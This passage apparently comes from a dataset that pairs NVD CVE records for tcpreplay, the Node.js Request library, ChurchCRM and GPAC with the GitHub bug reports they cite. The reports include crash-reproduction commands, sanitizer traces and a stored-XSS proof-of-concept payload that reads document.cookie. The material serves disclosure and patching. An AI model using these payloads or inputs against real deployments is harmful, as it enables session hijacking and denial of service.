__GI_abort () at abort.c:79 #2 0x00007ffff7d6d729 in __assert_fail_base (fmt=0x7ffff7f03588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x55555557242a "ports", file=0x555555572420 "portmap.c", line=69, function=<optimized out>) at assert.c:92 #3 0x00007ffff7d7ef36 in __GI___assert_fail (assertion=0x55555557242a "ports", file=0x555555572420 "portmap.c", line=69, function=0x5555555725c0 <__PRETTY_FUNCTION__.6999> "ports2PORT") at assert.c:101 #4 0x000055555555e28d in ports2PORT (ports=0x0) at portmap.c:69 #5 0x000055555555e83a in parse_portmap (portmap=0x555555580848, ourstr=0x55555557e2a0 "") at portmap.c:197 #6 0x000055555555b2e3 in tcpedit_post_args (tcpedit=0x55555557ffc0) at parse_args.c:191 #7 0x0000555555558c23 in main (argc=0, argv=0x7fffffffc2f8) at tcprewrite.c:89 ``` **System (please complete the following information):** - OS: Ubuntu - OS version: 20.04, 64 bit - Tcpreplay Version: master bcb107a ``` $ ./bin_normal/bin/tcprewrite -V tcprewrite version: 4.4.3 (build git:v4.4.3) Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net> The entire Tcpreplay Suite is licensed under the GPLv3 Cache file supported: 04 Not compiled with libdnet. Compiled against libpcap: 1.9.1 64 bit packet counters: enabled Verbose printing via tcpdump: enabled Fragroute engine: disabled ```
[Bug] Reachable assertion in ports2PORT() at portmap.c:69
https://api.github.com/repos/appneta/tcpreplay/issues/786/comments
1
2023-03-01T13:11:58Z
2023-06-05T02:12:13Z
https://github.com/appneta/tcpreplay/issues/786
1,604,953,701
786
4,859
CVE-2023-27789
2023-03-16T15:15:11.057
An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the cidr2cidr function at the cidr.c:178 endpoint.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/784" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/pull/783" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/784" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/pull/783" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/appneta/tcpreplay/issues/784
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "appneta", "tcpreplay" ]
**Describe the bug** There is a reachable assertion in `cidr2cidr()` when the user passes empty cidr string to `tcpprep` in CIDR-split mode. **To Reproduce** Steps to reproduce the behavior: 1. Get the Tcpreplay source code and compile it. ``` $ ./configure $ make ``` 2. Run Command `$ ./tcpprep --cidr="" --pcap=./test.pcap --cachefile=/dev/null` The file `test.pcap` is from tcpreplay codebase, which is located in `test/test.pcap`. **Expected behavior** Program reports assertion failure and is terminated. The GDB report: ``` $ gdb --args ./bin_normal/bin/tcpprep --cidr="" --pcap=./code/test/test.pcap --cachefile=/dev/null (gdb) r Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcpprep --cidr= --pcap=./code/test/test.pcap --cachefile=/dev/null tcpprep: cidr.c:178: cidr2cidr: Assertion `cidr' failed. Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7d6d859 in __GI_abort () at abort.c:79 #2 0x00007ffff7d6d729 in __assert_fail_base (fmt=0x7ffff7f03588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x555555565d1e "cidr", file=0x555555565d14 "cidr.c", line=178, function=<optimized out>) at assert.c:92 #3 0x00007ffff7d7ef36 in __GI___assert_fail (assertion=0x555555565d1e "cidr", file=0x555555565d14 "cidr.c", line=178, function=0x555555565dd0 <__PRETTY_FUNCTION__.6522> "cidr2cidr") at assert.c:101 #4 0x000055555555daa4 in cidr2cidr (cidr=0x0) at cidr.c:178 #5 0x000055555555de56 in parse_cidr (cidrdata=0x55555556db20, cidrin=0x55555558dbf0 "", delim=0x555555564d61 ",") at cidr.c:299 #6 0x0000555555557e6c in doOptCidr (pOptions=0x55555556bc00 <tcpprepOptions>, pOptDesc=0x55555556b0f0 <optDesc+208>) at tcpprep_opts.c:1217 #7 0x00007ffff7f4111e in ?? () from /lib/x86_64-linux-gnu/libopts.so.25 #8 0x00007ffff7f49964 in ?? () from /lib/x86_64-linux-gnu/libopts.so.25 #9 0x00007ffff7f4c7c8 in optionProcess () from /lib/x86_64-linux-gnu/libopts.so.25 #10 0x000055555555899c in main (argc=4, argv=0x7fffffffc2d8) at tcpprep.c:89 ``` **System (please complete the following information):** - OS: Ubuntu - OS version: 20.04, 64 bit - Tcpreplay Version: master bcb107a ``` $ ./bin_normal/bin/tcprewrite -V tcprewrite version: 4.4.3 (build git:v4.4.3) Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net> The entire Tcpreplay Suite is licensed under the GPLv3 Cache file supported: 04 Not compiled with libdnet. Compiled against libpcap: 1.9.1 64 bit packet counters: enabled Verbose printing via tcpdump: enabled Fragroute engine: disabled ```
[Bug] Reachable assertion in cidr2cidr() at cidr.c:178
https://api.github.com/repos/appneta/tcpreplay/issues/784/comments
1
2023-03-01T13:03:02Z
2023-06-05T02:10:42Z
https://github.com/appneta/tcpreplay/issues/784
1,604,938,815
784
4,860
CVE-2023-28155
2023-03-16T15:15:11.107
The Request package through 2.88.1 for Node.js allows a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Technical Description", "Third Party Advisory" ], "url": "https://doyensec.com/resources/Doyensec_Advisory_RequestSSRF_Q12023.pdf" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Technical Description", "Vendor Advisory" ], "url": "https://github.com/request/request/issues/3442" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/request/request/pull/3444" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20230413-0007/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Technical Description", "Third Party Advisory" ], "url": "https://doyensec.com/resources/Doyensec_Advisory_RequestSSRF_Q12023.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Technical Description", "Vendor Advisory" ], "url": "https://github.com/request/request/issues/3442" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/request/request/pull/3444" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20230413-0007/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:request_project:request:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "1F9F582D-5FBC-49BE-B2B3-9971CA676B17", "versionEndExcluding": null, "versionEndIncluding": "2.88.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/request/request/issues/3442
[ "Exploit", "Issue Tracking", "Patch", "Technical Description", "Vendor Advisory" ]
github.com
[ "request", "request" ]
### Summary I am a security researcher at [Doyensec](https://doyensec.com/). During a security engagement I have identified a security vulnerability in the Request library. In a spirit of a Responsible Disclosure we have tried to contact the maintainer directly on 12/02/2022 and 01/18/2023 via [email](mikeal.rogers@gmail.com), but we have received no answer. Please provide a communication channel that would allow us to share the technical details and the proposed fix, otherwise we will be forced to disclose the vulnerability publicly. You can contact me via email: szymon@doyensec.com
CVE-2023-28155 Request allows a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect
https://api.github.com/repos/request/request/issues/3442/comments
7
2023-03-08T13:32:01Z
2023-07-28T09:09:54Z
https://github.com/request/request/issues/3442
1,615,278,376
3,442
4,861
CVE-2023-27059
2023-03-16T22:15:11.453
A cross-site scripting (XSS) vulnerability in the Edit Group function of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Edit Group Name text field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/ChurchCRM/CRM/issues/6450" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/ChurchCRM/CRM/issues/6450" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*", "matchCriteriaId": "C5A21E4C-1CE8-4C97-9374-DD8EBDB942D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/ChurchCRM/CRM/issues/6450
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "ChurchCRM", "CRM" ]
**If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.** #### On what page in the application did you find this issue? #### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows? windows #### What browser (and version) are you running? Edge #### What version of PHP is the server running? 7.4.3 #### What version of SQL Server are you running? 5.7.26 #### What version of ChurchCRM are you running? 4.5.3 Severity: middle Description: A stored XSS was found in the application editing group name, where malicious JS or HTML code can be inserted, allowing attackers to steal sensitive information, hijack user sessions, or perform other malicious operations on behalf of the victim. This vulnerability is caused by the lack of effective encoding processing of input and output in the background. Impact: Stored XSS, also known as persistent XSS, is a type of cross-site scripting attack in which the malicious code is permanently stored on the server and delivered to every user who accesses the affected page. The attacker typically injects the malicious code, such as JavaScript or HTML, into a form field or other input field that is stored in a database or other data storage location. When the victim accesses the page containing the stored malicious code, the code is executed in the victim's browser, allowing the attacker to steal sensitive information, hijack user sessions, or perform other malicious actions on behalf of the victim. Affected Component: /churchcrm/GroupList.php Technical Details: The vulnerability is caused by the failure of the backend to effectively validate user input. An attacker can insert malicious js code and store it in the database, allowing the attacker to steal sensitive information, hijack user sessions, or perform other malicious operations on behalf of the victim. Proof of Concept (PoC): `<img src=1 onclick=alert(document.cookie)>` ![1](https://user-images.githubusercontent.com/97539349/219936360-a6c2769b-925c-4c84-8df8-a775c6cc1378.png) The vulnerability will trigger when another user visits the page ![2](https://user-images.githubusercontent.com/97539349/219936382-e448425a-5557-4e35-9eda-0393b5ef45aa.png) Remediation: 1.Input validation: All user input should be validated on the server-side to ensure that it conforms to the expected format and does not contain any malicious code. Input validation should be performed on both client-side and server-side, and should be designed to detect and block any attempts to inject scripts or other malicious content. 2.Output encoding: All data that is displayed on a web page should be properly encoded to prevent script injection. This includes data stored in a database or other data storage location, as well as data that is passed between pages or included in page templates. Proper encoding can include HTML entity encoding, URL encoding, or JavaScript escaping, depending on the specific context and data being displayed.
A cross-site scripting vulnerability (XSS) exists in the edit group function
https://api.github.com/repos/ChurchCRM/CRM/issues/6450/comments
7
2023-02-19T08:13:59Z
2024-10-08T01:14:38Z
https://github.com/ChurchCRM/CRM/issues/6450
1,590,603,154
6,450
4,862
CVE-2023-1448
2023-03-17T07:15:12.093
A vulnerability, which was classified as problematic, was found in GPAC 2.3-DEV-rev35-gbbca86917-master. This affects the function gf_m2ts_process_sdt of the file media_tools/mpegts.c. The manipulation leads to heap-based buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier VDB-223293 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2388" }, { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/xxy1126/Vuln/blob/main/gpac/3" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.223293" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.223293" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2388" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/xxy1126/Vuln/blob/main/gpac/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.223293" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.223293" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3:dev:*:*:*:*:*:*", "matchCriteriaId": "0099B624-674B-4F45-9270-DD638617A1D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "122" ]
122
https://github.com/gpac/gpac/issues/2388
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ ## version ``` MP4Box - GPAC version 2.3-DEV-rev35-gbbca86917-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ## reproduce complie and run ``` ./configure --enable-sanitizer make ./MP4Box -info poc ``` information reported by sanitizer ``` ================================================================= ==4003817==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000001114 at pc 0x7fa5cde90b3b bp 0x7ffe09c26cd0 sp 0x7ffe09c26cc0 READ of size 1 at 0x603000001114 thread T0 #0 0x7fa5cde90b3a in gf_m2ts_process_sdt media_tools/mpegts.c:828 #1 0x7fa5cde8cb21 in gf_m2ts_section_complete media_tools/mpegts.c:623 #2 0x7fa5cde8ff0b in gf_m2ts_gather_section media_tools/mpegts.c:760 #3 0x7fa5cdeb0db9 in gf_m2ts_process_packet media_tools/mpegts.c:2703 #4 0x7fa5cdeb3125 in gf_m2ts_process_data media_tools/mpegts.c:2812 #5 0x7fa5cdeb8145 in gf_m2ts_probe_buffer media_tools/mpegts.c:3196 #6 0x7fa5cdeb886c in gf_m2ts_probe_data media_tools/mpegts.c:3251 #7 0x7fa5ceb1df9f in m2tsdmx_probe_data filters/dmx_m2ts.c:1438 #8 0x7fa5ce8d92a4 in gf_filter_pid_raw_new filter_core/filter.c:4210 #9 0x7fa5cec2cb68 in filein_process filters/in_file.c:492 #10 0x7fa5ce8c1be4 in gf_filter_process_task filter_core/filter.c:2828 #11 0x7fa5ce86c6d7 in gf_fs_thread_proc filter_core/filter_session.c:1859 #12 0x7fa5ce86fce8 in gf_fs_run filter_core/filter_session.c:2120 #13 0x7fa5cde7b742 in gf_media_import media_tools/media_import.c:1228 #14 0x55d5db4c09ab in convert_file_info /root/gpac/applications/mp4box/fileimport.c:130 #15 0x55d5db47907d in mp4box_main /root/gpac/applications/mp4box/mp4box.c:6302 #16 0x55d5db47bcc0 in main /root/gpac/applications/mp4box/mp4box.c:6846 #17 0x7fa5c8e02082 in __libc_start_main ../csu/libc-start.c:308 #18 0x55d5db439b6d in _start (/root/gpac/bin/gcc/MP4Box+0x104b6d) Address 0x603000001114 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow media_tools/mpegts.c:828 in gf_m2ts_process_sdt Shadow bytes around the buggy address: 0x0c067fff81d0: 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00 00 fa 0x0c067fff81e0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x0c067fff81f0: fd fa fa fa 00 00 01 fa fa fa fd fd fd fa fa fa 0x0c067fff8200: 00 00 00 03 fa fa 00 00 00 03 fa fa 00 00 00 00 0x0c067fff8210: fa fa 00 00 04 fa fa fa 00 00 01 fa fa fa fa fa =>0x0c067fff8220: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==4003817==ABORTING ``` ## poc https://github.com/xxy1126/Vuln/blob/main/gpac/3
Heap-buffer-overflow in function gf_m2ts_process_sdt of media_tools/mpegts.c:828
https://api.github.com/repos/gpac/gpac/issues/2388/comments
2
2023-02-02T14:57:17Z
2023-03-21T04:19:07Z
https://github.com/gpac/gpac/issues/2388
1,568,208,539
2,388
4,863
CVE-2023-1449
2023-03-17T07:15:12.347
A vulnerability has been found in GPAC 2.3-DEV-rev35-gbbca86917-master and classified as problematic. This vulnerability affects the function gf_av1_reset_state of the file media_tools/av_parsers.c. The manipulation leads to double free. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-223294 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2387" }, { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/xxy1126/Vuln/blob/main/gpac/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.223294" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.223294" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2387" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/xxy1126/Vuln/blob/main/gpac/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.223294" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.223294" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3:dev:*:*:*:*:*:*", "matchCriteriaId": "0099B624-674B-4F45-9270-DD638617A1D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/gpac/gpac/issues/2387
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ ## version ``` MP4Box - GPAC version 2.3-DEV-rev35-gbbca86917-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer --enable-debug Features: GPAC_CONFIG_LINUX 